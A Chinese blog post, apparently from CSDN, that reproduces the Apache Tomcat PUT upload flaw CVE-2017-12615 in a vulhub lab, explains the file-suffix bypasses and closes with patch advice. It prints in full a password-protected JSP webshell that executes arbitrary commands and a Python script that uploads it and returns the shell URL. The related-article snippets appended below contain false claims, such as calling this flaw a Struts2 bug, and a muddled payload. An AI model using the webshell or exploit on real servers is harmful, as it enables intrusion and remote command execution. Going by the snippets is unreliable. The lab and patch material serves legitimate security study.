TomcatPUT的上传漏洞(CVE-2017-12615)

最新推荐文章于 2024-06-03 15:39:32 发布
最新推荐文章于 2024-06-03 15:39:32 发布
阅读量3.6k 收藏 7
点赞数 2
分类专栏: 中间件漏洞 文章标签: 安全 django python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/121415487
版权

TomcatPUT的上传漏洞(CVE-2017-12615)

漏洞描述:


当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。

受影响的版本:

Apache Tomcat 7.0.0 to 7.0.79

利用条件:


Apache Tomcat 默认开启 PUT 方法,org.apache.catalina.servlets.DefaultServlet的 readonly 默认为 true,需要手动配置readonly为false才可以进行漏洞利用,而且默认没有在 Tomcat/conf/web.xml 里写,(逗号)。需要手工添加并且改为 false,才可以进行测试。

漏洞原理:


本次 Apache Tomcat 的 CVE 漏洞涉及到 DefaultServlet 和 JspServlet,DefaultServlet 的作用是处理静态文件 ,JspServlet 的作用是处理 jsp 与 jspx 文件的请求,同时 DefaultServlet 可以处理 PUT 或 DELETE 请求,以下是默认配置情况:

除了 jsp 和 jspx 默认是由 org.apache.jasper.servlet.JspServlet 处理,其他默认都是由org.apache.catalina.servlets.DefaultServlet 来处理。可以看出即使设置 readonly 为 false,默认 tomcat 也不允许 PUT 上传 jsp 和 jspx 文件的,因为后端都用org.apache.jasper.servlet.JspServlet 来处理 jsp 或是 jspx 后缀的请求了,而 JspServlet 中没有 PUT 上传的逻辑,PUT 的代码实现只存在于 DefaultServlet 中。这个漏洞的根本是通过构造特殊后缀名,绕过了 tomcat 检测,让它用 DefaultServlet 的逻辑去处理请求,从而上传 jsp 文件。

目前主要三种方法:

evil.jsp%20

evil.jsp::$DATA

evil.jsp/

利用这两种姿势 PUT 请求 tomcat 的时候,骗过 tomcat 而进入 DefaultServlet 处理的逻辑。

调试 DefaultServlet.java 代码流程,设置 readOnly 为 false

先调用栈

重点看 doPut,这里 tomcat 开始处理 PUT 请求,可以看到这里如果 readonly 是 true 就直接进入 error 了,所以需要设置成 false。 

真正写入文件在 FileDirContext.java 的 rebind 函数里。

FileOutputStream 特性:

 jsp%20 或是 jsp::$DATA 后缀的时候,为什么最终却写入 .jsp 后缀的文件,这些其实是 java.io. FileOutputStream (java.io包里的类)的问题了,具体需要分析 jdk 的 C 代码才能得到解答,其最终是调用 windows 的 CreateFileW 实现文件创建,而在 windows 下,创建文件是对后缀名称有要求的,例如:如果后缀末尾是空格,会被去掉,a.txt::$DATA传入 CreateFileW 也会被处理成 a.txt

是evil.jsp/时,这种方法也可以 PUT 上传,但是不同于上面两种,这种方法是利用了 File 类的特性。测试发现 java.io.File 会过滤掉子文件名末尾的斜杠所以可以导致后面文件写入 jsp 文件。

环境搭建:

这里使用docker+vulhub搭建漏洞环境,在centos7上搭建vulhub的步骤如下:
安装docker依赖包
        yum install -y yum-utils device-mapper-persistent-data lvm2
安装docker
        yum install docker
启动docker
        systemctl start docker
下载vulhub
        https://github.com/vulhub/vulhub/archive/master.zip

安装docker-compose之前需要先安装python-pip

        yum -y install epel-release

        yum -y install python-pip

安装docker-compose

        pip install docker-compose
找到CVE-2017-12615,并进入

启动漏洞环境,vulhub的漏洞环境已经搭建好,不需要我们手动修改配置文件。
        docker-compose up -d
查看服务启动状态

测试环境就关闭防火墙啦
        systemctl stop firewalld.service/iptables.service 

漏洞复现:

安装Tomcat可成功访问:

按照上述利用条件对配置文件进行设置,并且重启Tomcat:

payload1:测试任意文件上传,用burpsuite 进行抓包并做如下修改(GET请求改为PUT,修改名字,并在下面添加jsp的shell)

shell:

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp

+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

 然后进行访问,成功上传

上传成功后便可远程进行命令执行,如下图所示:

大佬poc代码:

#! -*- coding:utf-8 -*-

import httplib

import sys

import time

body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp

+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''

try:

    conn = httplib.HTTPConnection(sys.argv[1])

    conn.request(method='OPTIONS', url='/ffffzz')

    headers = dict(conn.getresponse().getheaders())

    if 'allow' in headers and \
       headers['allow'].find('PUT') > 0 :

        conn.close()

        conn = httplib.HTTPConnection(sys.argv[1])

        url = "/" + str(int(time.time()))+'.jsp/'

        #url = "/" + str(int(time.time()))+'.jsp::$DATA'

        conn.request( method='PUT', url= url, body=body)

        res = conn.getresponse()

        if res.status  == 201 :

            #print 'shell:', 'http://' + sys.argv[1] + url[:-7]

            print 'shell:', 'http://' + sys.argv[1] + url[:-1]

        elif res.status == 204 :

            print 'file exists'

        else:

            print 'error'

        conn.close()

    else:

        print 'Server not vulnerable'

except Exception,e:

    print 'Error:', e

运行POC脚本,python DarkHQ.py 127.0.0.1:8080,成功生成shell

同样可远程执行命令

漏洞修复:


官方建议受影响的版本及时更新到Apache Tomcat 7.0.81
根据业务评估配置 conf/webxml 文件的 readOnly 值为 Ture 或注释参数,禁用 PUT 方法并重启 tomcat 服务,临时规避安全风险; 注意: 如果禁用 PUT 方法,对于依赖PUT方法的应用,可能导致业务失效。

总结:


从以上分析可以得出,该漏洞利用的前提条件需要手动开启 readOnly 功能,以支持上传操作,在 Apache tomcat 7.X 版本默认配置的情况下是无法成功利用漏洞,从实际测试来看,漏洞危害性并没有那么高,但是如果用户一旦启用了 readOnly 功能,黑客可利用漏洞成功入侵。

xzhome
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Tomcat PUT 方法任意写文件漏洞CVE-2017-12615)复现
weixin_47498728的博客
01-06 878
tomcat本身不允许上 jsp 文件,但是1.jsp/ 加了 / 就不是 jsp 文件,所以文件可以成功上。系统保存文件时因为不能存在/字符,所以/被忽略了,所以文件名从 1.jsp/ -> 1.jsp,至此jsp文件完成了上并保存。
中间件安全—Tomcat常见漏洞
剁椒鱼头没剁椒的博客
02-22 5949
链接。
tomcat系列漏洞利用
最新发布
2401_84488537的博客
06-03 1326
Tomcat 服务器是一个开源的轻量级Web应用服务器,在中小型系统和并发量小的场合下被普遍使用。主要组件:服务器Server,服务Service,连接器Connector、容器Container。连接器Connector和容器Container是Tomcat的核心。一个Container容器和一个或多个Connector组合在一起,加上其他一些支持的组件共同组成一个Service服务,有了Service服务便可以对外提供能力了。
TOMCAT PUT方法任意写文件(CVE-2017-12615)-靶场复现
m0_66376444的博客
04-06 594
当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上包含任意代码的 JSP 文件。其实tomcat会对上的文件内容进行限制,比如说禁止上 .jpg 后缀的文件,只不过,这个过滤机制可以通过一些windows 或着 linux的特性绕过。2、修改请求协议PUT加文件名,在请求主体内写入可执行代码,点击发送。本次测试版本:Tomcat版本:8.5.19。
TomcatPUT的文件上漏洞(CVE-2017-12615)
weixin_52458793的博客
02-12 1154
详细教程
漏洞复现】Apache_Tomcat_PUT方法任意写文件(CVE-2017-12615)
过期的秋刀鱼
11-04 770
当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。用burpsuite 进行抓包并做如下修改(GET请求改为PUT,修改名字,并在下面添加jsp的shell)即可看到Tomcat的Example页面。工具扫出来的结果,验证漏洞存在。
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
Tomcat PUT方法任意写漏洞复现
weixin_53696027的博客
02-12 458
CVE-2017-12616Tomcat PUT任意上漏洞复现过程
buuctf [Tomcat]CVE-2017-12615
qq_1873822的博客
03-17 1539
漏洞简介 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。 漏洞影响 Apache Tomcat 7.0.0 – 7.0.81 ...
Tomcat任意文件上漏洞(CVE-2017-12615)
qq_51331767的博客
02-12 474
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中远程代码执行漏洞CVE-2017-12615)。一定条件下,攻击者可以利用该漏洞,通过上的jsp文件,在服务器上执行任意代码,导致数据泄露或权限被获取,存在高安全风险。
Tomcat任意文件上CVE-2017-12615)
m0_73720136的博客
05-07 1108
掌握文件上中的Tomcat任意文件上CVE-2017-12615)漏洞影响的Tomcat版本以及配置文件,利用Burp Suite工具抓取数据包,将数据包内容修改,请求方式修改为PUT方式,上新建的jsp脚本文件,文件内容可以任意编写,也可以是木马。1. NTFS文件流2. 文件名相关限制可以采取一些方法来绕过限制,比如Windows中文件名不能以空格结尾,在文件名后面加空格"%20",也可以加斜杠"/"。
【vulhub】tomcat CVE-2017-12615 CVE-2020-1938 tomcat8
qq_58873970的博客
09-12 279
Tomcat是Apache基金会(Apache Software Foundation)的Jakarta项目中的一个核心项目,由Apache、Sun和其他一些公司及个人共同开发而成。由于有了Sun的参与和支持,最新的Servlet和JSP总是能在Tomcat中得到体现,Tomcat服务器是一个免费的开源代码的Web引用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍应用,是开发和调试JSP程序的首选。
漏洞复现】Tomcat CVE-2017-12615 (任意文件上漏洞)
做自己喜欢的事,并将其发挥到极致!
02-16 2492
文章目录前言一、漏洞描述二、影响版本三、漏洞分析四、本地复现五、修复建议 前言 本篇文章仅用于安全研究和技能学习,切勿用于非授权情况下渗透攻击行为,出现任何后果与本文作者无关。 一、漏洞描述 但存在漏洞的Tomcat运行在Windows/Linux主机上,且启用了HTTP PUT请求方法(例如将 “readonly” 初始化参数由默认值设置为 “false”),攻击者通过精心构造的攻击请求数据包向服务器上包含任意代码的JSP的WebShell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器
Tomcat的PUT的上漏洞(CVE-2017-12615)
Fly_鹏程万里
10-30 5287
近期在项目中碰到的ApacheTomcat中间件愈来愈多,于是乎。想着做一个整理。将ApacheTomcat中间件的几大较为重要的高危漏洞做一个总结整理复现。用作来巩固更新自己的知识库。 首先我们先来了解以下Tomcat的概念: Tomcat是我们在工作中所使用的一款开源轻量级的Web应用程序服务器。通常情况下在中小型系统或者并发量较小的场合下使用,常用来与JSP和PHP脚本结合使来解析脚本语...
Tomcat系列漏洞复现——vulhub
qq_45612828的博客
07-17 1640
Tomcat PUT方法任意写文件漏洞CVE-2017-12615) Tomcat AJP 文件包含漏洞CVE-2020-1938) Tomcat7+ 弱口令 && 后台getshell漏洞
cve-2017-12615漏洞复现
06-28
### 回答1: cve-2017-12615漏洞是Apache Tomcat服务器中的一个远程代码执行漏洞。攻击者可以通过发送特定的HTTP请求来利用该漏洞,从而在服务器上执行任意代码。 要复现该漏洞,需要满足以下条件: 1. 目标服务器上运行的是Apache Tomcat 7..至7..79版本或8.5.至8.5.16版本。 2. 目标服务器上存在一个Web应用程序,其中包含一个可上文件的Servlet。 3. 目标服务器上的Web应用程序未正确配置,允许攻击者上包含恶意代码的JSP文件。 攻击者可以通过发送以下HTTP请求来利用该漏洞: PUT /test.jsp/ HTTP/1.1 Host: target.com Connection: close Content-Length: 100 <% out.println("Hello, world!"); %> 其中,test.jsp是攻击者上的包含恶意代码的JSP文件。攻击者还需要在请求中包含一个特殊的Content-Type头,以触发漏洞。 如果攻击成功,攻击者就可以在目标服务器上执行任意代码,包括获取敏感信息、修改数据或者控制整个服务器。因此,建议管理员及时升级Apache Tomcat服务器,或者对Web应用程序进行正确的配置和安全审计。 ### 回答2: CVE-2017-12615漏洞是Apache Tomcat中的一个目录遍历漏洞,它使得攻击者能够通过发送特定的HTTP请求,获取Tomcat服务器上应用程序的敏感信息。这种漏洞的原因是Tomcat默认启用了WebDAV(Web Distributed Authoring and Versioning)服务,攻击者可以发送特定的HTTP PUT请求利用该漏洞向服务器发送恶意的WAR文件,并且可以通过使用Windows UNC路径造成RCE漏洞。 下面是CVE-2017-12615漏洞的复现步骤: 1.安装Tomcat服务器 2.根据Tomcat的版本,下载特定的利用工具(e.g.,ysoserial.jar 或者wmx.jar)。 3.使用ysoserial.jar或者wmx.jar(如图所示)创建一个恶意文件,并通过PUT请求将它上到目标服务器。 4.在表单中输入如下内容: PUT /test.txt/WEB-INF/web.xml HTTP/1.1 Host: [Tomcat address]:[listening port] User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/xml Content-Length: 284 <?xml version="1.0"?> <!DOCTYPE x [ <!ELEMENT x ANY> <!ENTITY % p1 SYSTEM "file:///c:/windows/system32/test.bat"> <!ENTITY % p2 "<!ENTITY p3 '′%p1;%p1;′'>"> %p2;%p3; ]> 5.从服务器上获取war文件并进行反序列化,验证漏洞是否真实存在。 6.如果漏洞存在,则攻击者可以使用该漏洞获取Tomcat服务器上应用程序的敏感信息,并且可以在服务器上执行任意命令。 为了缓解该漏洞产生的风险,我们可以通过禁用WebDAV服务、运行Tomcat服务器以非特权用户身份、 对上文件类型进行限制, 或者升级最新的Tomcat版本等方式来解决该漏洞。 ### 回答3: CVE-2017-12615 是 Apache Tomcat 中的一个远程代码执行漏洞。该漏洞存在于 Tomcat 7.0.0 到 7.0.79 版本和 Tomcat 8.5.0 到 8.5.16 版本中。攻击者可以利用该漏洞通过 HTTP 协议上恶意 JSP 文件并执行任意命令。 为了演示该漏洞的复现,我们需要先搭建一个虚拟机环境来运行 Apache Tomcat。在这里,我们以 Ubuntu 16.04.6 LTS 作为漏洞环境的操作系统。 安装 Apache Tomcat 首先,我们需要安装 Apache Tomcat。在终端窗口中执行以下命令: sudo apt-get update sudo apt-get install tomcat7 安装完成后,我们可以通过访问以下 URL 来确认 Tomcat 是否成功安装: http://localhost:8080/ 如果可以看到 Tomcat 的欢迎页面,则说明安装成功。 复现漏洞 接下来,我们需要复现 CVE-2017-12615 漏洞。步骤如下: 1. 创建一个名为 test.jsp 的 JSP 文件,该文件包含以下代码: <% if ("POST".equals(request.getMethod())) { Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream())); String line; while ((line = in.readLine()) != null) { out.println(line); } in.close(); } %> 2. 通过以下命令创建一个名为 test.war 的 Web 应用程序文件: jar -cvf test.war test.jsp 3. 接下来,我们需要在 Tomcat 的 webapps 目录下创建一个名为 test 目录。接着,将上的 test.war 文件复制到该目录下: sudo mkdir /var/lib/tomcat7/webapps/test sudo mv test.war /var/lib/tomcat7/webapps/test/ 4. 通过以下 URL 访问 test.jsp 文件,可以发现该页面中含有一个命令执行的输入框: http://localhost:8080/test/test.jsp 5. 在输入框中输入以下命令,即可执行该命令并返回结果: cmd=ls 我们可以看到,这个漏洞可以允许攻击者上包含恶意代码的 JSP 文件并执行恶意命令,扰乱服务器系统。因此,我们需要对 Apache Tomcat 应用程序服务器进行及时修复。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值